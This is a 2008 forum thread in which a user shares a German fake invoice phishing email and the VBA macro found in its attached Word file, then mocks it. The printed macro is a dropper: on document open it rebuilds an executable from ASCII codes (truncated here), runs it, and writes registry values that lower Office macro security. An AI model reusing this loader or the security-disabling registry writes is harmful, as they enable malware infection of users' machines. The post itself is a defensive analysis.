Page 1 of 1
malware mail: How stupid do they think I am?
Posted: Tue Sep 09, 2008 2:22 pm
by ^rooker
Today I've received an email that had SPAM/Malware written all over it:
Sehr geehrte Damen und Herren!
Die Anzahlung 447043870189 ist erfolgt
Es wurden 9620.00 EURO von Ihrem Konto abgebucht.
Die Auflistung der Kosten finden Sie im Anhang
Zyklop Inkasso Deutschland GmbH
Königsberger Str. 10
D-47809 Krefeld
Geschäftsführer: Lothar Hilse, Gerhard Liebchen
Handelsregister: Amtsgericht Krefeld HRB 35 89
Aufsichtsbehörde: Landgerichtspräsident Krefeld
USt-IdNr.: DE 120 154 439
Now, come ooooon.... that's ridiculous. So what's the message of that mail? It's probably the attachment:
rechnung.zip, containing something even more suspicious:
rechnung.doc
I hate getting .doc files per mail in general! That file is even 289.280 Bytes in size. So what's in it? A macro - of course:
Posted: Tue Sep 09, 2008 2:27 pm
by ^rooker
Code: Select all
Rem Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Rem Const iSymbols = 45297
Rem Const iBlockCount = 158
Rem Dim b(1 To 158) As String
Rem
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|..."
Rem End Sub
Rem
Rem Private Sub MyMessage()
Rem End Sub
Rem
Rem
Rem Private Sub Loader()
Rem Dim dumpfile As String: Dim exefile As String
Rem Dim i As Long
Rem Call Shellcode
Rem For i = 1 To iBlockCount
Rem dumpfile = dumpfile & b(i)
Rem Next i
Rem Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
Rem For i = 0 To iSymbols - 1
Rem exefile = exefile & Chr(parsearr(i))
Rem Next i
Rem Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Rem Put #1, , exefile
Rem Close #1
Rem Shell (NameOfLocalFile)
Rem Call DisableSecurity
Rem Call MyMessage
Rem End Sub
Rem
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem
Rem Private Sub DisableSecurity()
Rem Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
Rem End Sub
Rem
Rem
End Sub
The "Rem"s at the beginning of each line actually disable the whole code - I wonder if that was automatically done by OpenOffice (which I used for opening the file).
The b()="..." is a sequence of ascii codes - according to the number of "0" characters in there it's probably a binary executable.
This is the most bloated, fucked up and insulting "virus" I've ever received... If I wasn't running Linux, I'd probably be scared.
Posted: Wed Dec 03, 2008 4:40 pm
by carmofin
where did *she* get that amount of money from?
Posted: Wed Dec 03, 2008 6:04 pm
by ^rooker
400.000 USD??
wow.